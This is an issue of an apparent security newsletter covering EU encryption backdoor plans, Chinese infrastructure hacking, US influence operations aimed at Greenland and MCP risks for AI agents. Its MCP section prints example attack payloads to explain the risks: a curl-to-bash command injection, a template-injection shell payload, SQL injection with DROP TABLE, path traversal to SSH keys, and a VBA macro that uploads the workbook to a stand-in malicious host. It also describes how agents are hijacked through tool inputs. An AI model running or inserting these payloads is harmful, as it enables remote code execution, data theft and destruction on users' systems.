TechLetters ☕️ EU wants to weaken encryption again? This time for safety reasons. Information operations to conquer Greenland? EU policymakers think that EU cyber capabilities is weak. AI injection.
Reducing fingerprinting surface by decreasing the amount of information sent to websites. Here: limit the list of accepted languages, from many, to one. My analysis.
Security
The European Union has announced plans allegedly meant to keep the people of Europe safe by backdooring communication. So, to keep Europeans safe, the plan is based on building in backdoors (backdoors) to allow easy eavesdropping on messengers used in Europe. https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52025PC0148
Chinese officials “confirmed” (well, they did not say anything) that China is doing advanced cyberoperations. Against U.S. systems and infrastructure (ports, water utilities, airports and other targets). So let’s assume that it was a ‘tacit confirmation’. The reason is apparently U.S. involvement with Taiwan. Cyber-retorsions? We should not be surprised. It's just another confirmation that cyber capabilities are integral in statecraft (I explain this in my book Philosophy of Cybersecurity). And now it's "among the most troubling security threats facing the Trump administration". "China didn’t appear to understand how dangerous prepositioning in civilian critical infrastructure was, and how much the U.S. would view it as an act of war" (note: whether it could be seen as an act of war depends on what the functionality really was, merely placing 'whatever' does not check the box). https://www.wsj.com/politics/national-security/in-secret-meeting-china-acknowledged-role-in-u-s-infrastructure-hacks-c5ab37cb?st=cywt4e&reflink=desktopwebshare_permalink
Reports about the U.S. planned approach to Greenland via information operations. This is not about military conquest, but about shaping perception and influence. It involves information operations, strategic messaging, narrative building, and psychological influence. The plan considered the use of advertising campaigns and social media to shape public opinion — with messaging directed specifically at Greenland’s population. The narrative would be based on shared Inuit heritage (between Greenlanders and Alaskans, so now Americans), the promise of economic development, and protection from the U.S. as a path to prosperity. This is a textbook example of influence operations. It’s a hybrid strategy in the full sense of the word — no boots on the ground, but intense informational pressure. Media campaigns, references to distant historical events to draw modern conclusions, promises of economic benefits — all aimed at changing how people think. But such a move carries significant risk. It could seriously undermine trust in U.S. intentions, especially in the eyes of its allies. The line between diplomacy and manipulation is beginning to blur, and the pressure placed on Denmark resembles methods used by countries the U.S. has officially opposed, like China and Russia. Let me say somethng: from an analytical standpoint, this is a fascinating case, and it would be interesting to watch — but achieving real results in a short time is nearly impossible. Influence operations require time and resources. Without 2–3 years of sustained activity, this plan is unlikely to succeed. https://www.nytimes.com/2025/04/10/us/politics/trump-greenland-denmark.html
German military fears cyberattacks leading to societal harms, even disintegration (animals on farms dying, mobs looting supermarkets). German bureaucracy makes building resiliency impossible, making it the easiest target in Europe. "China appears to be preparing for sabotage". But there’s more: "U.S. cyber deterrence, which also protects Europe, has been partially dismantled"? The view that the US is the only one capable in cyber is a myth. It’s unfortunate that EU policymakers apparently assume that the EU is weak in everything. https://asia.nikkei.com/Spotlight/Cybersecurity/China-can-flick-EU-kill-switch-Europe-mulls-cyberattack-risk
The road to AI processing introduces serious cybersecurity vulnerabilities. One of the interesting issues is the new face of CODE INJECTION via the Model Context Protocol (MCP) — a framework that allows large language model (LLM) agents to connect to external tools, software, maintain state (For example to automate the use of software). It’s like giving your AI agent a plug-and-play interface for the internet and your backend. It's not secure. For example, an MCP-connected tool might define a simple function like def notify(notification_info): os.system("notify-send " + notification_info['msg']). Seems harmless until someone passes "; curl http://malicious.site/payload.sh | bash" as the msg parameter. Now the agent, acting with full trust, executes remote code on your system.
Another example could be:
def save_note(note): with open("/tmp/note.txt", "w") as f: f.write(note) If an attacker passes a payload like {{.__class__.__mro__[1].__subclasses__()[40]("/bin/sh",shell=True,stdout=-1).communicate("curl http://evil.site | bash")}}
OR here you have a reinvention of SQL injection via LLM:
def get_user_info(user_id): return db.execute("SELECT * FROM users WHERE id = " + user_id) Passing 1 OR 1=1; -- returns all users, and with chained commands (1; DROP TABLE users; --)
Or this:
def read_config(filename): with open("/configs/" + filename) as f: return f.read() Attacker sends ../../.ssh/id_rsa, accessing private SSH keys outside the intended directory.
Or:
Sub FormatAndExfiltrate()
Range("A1").Font.Bold = True ' Ordinary formatting
Dim http As Object: Set http = CreateObject("MSXML2.XMLHTTP")
Dim fso As Object: Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempFile As Object: Set tempFile = fso.GetFile(ThisWorkbook.FullName)
http.Open "POST", "http://malicious.site/upload", False
http.setRequestHeader "Content-Type", "application/octet-stream"
http.Send tempFile.OpenAsTextStream(1, -2).ReadAll
End Sub
This is how attackers turn a helpful assistant into an entry point for shell access, credential theft, or lateral movement. Without, access control, or integrity checks built into MCP, it’s shockingly easy to inject malicious behavior into these agents — especially when users have no visibility into the full instructions an AI is processing. And especially in the vibe coding paradigm. https://elenacross7.medium.com/%EF%B8%8F-the-s-in-mcp-stands-for-security-91407b33ed6b
Privacy
Deploying zero-knowledge proofs for fraud-prevention directly in the web browser. The goal is not to use cookies for that. https://explainers-by-googlers.github.io/private-proof/
Technology Policy
Foreign intelligence entities, particularly those in China, are targeting current and former U.S. government (USG) employees for recruitment by posing as consulting firms, corporate headhunters, think tanks, and other entities on social and professional networking sites. https://www.dni.gov/files/NCSC/documents/products/2025-04-08-NCSC-FBI-DCSA-OnlineTargetingUSGEmployees.pdf
Other
In case you feel it's worth it to forward this content further:
Subscribed
If you’d like to share: